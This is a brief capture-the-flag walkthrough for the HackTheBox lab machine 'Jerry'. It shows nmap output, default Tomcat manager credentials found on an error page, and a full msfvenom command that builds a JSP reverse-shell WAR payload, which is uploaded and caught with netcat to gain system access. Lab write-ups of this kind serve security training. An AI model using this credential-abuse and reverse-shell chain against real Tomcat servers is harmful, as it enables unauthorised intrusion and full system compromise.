HTB — Jerry

Machine ip — 10.10.10.95

Nmap

PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Here we just found port 8080 to be open after visiting there we get to know that Apache Tomcat 7.0.88 is running on it

After enumerating for a while we get manager app and then when we select it redirects us to a login popup after giving invalid creds it redirects us to 404 page where the username as password are shown in plain text

user named tomcat with a password of s3cret

Now we get username and password let’s try loggin in again we get the Tomcat Web Application Manager

There we get a upload option which uploads war files

So let’s make a .war payload with the use of msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Now let’s upload this sheel1.war , and after uploading we get a new path in application manager shell1.war

So let’s start our nc at selected port

and call shell1.war form application manager

And here we get out system shell now we can access every file file in system 😉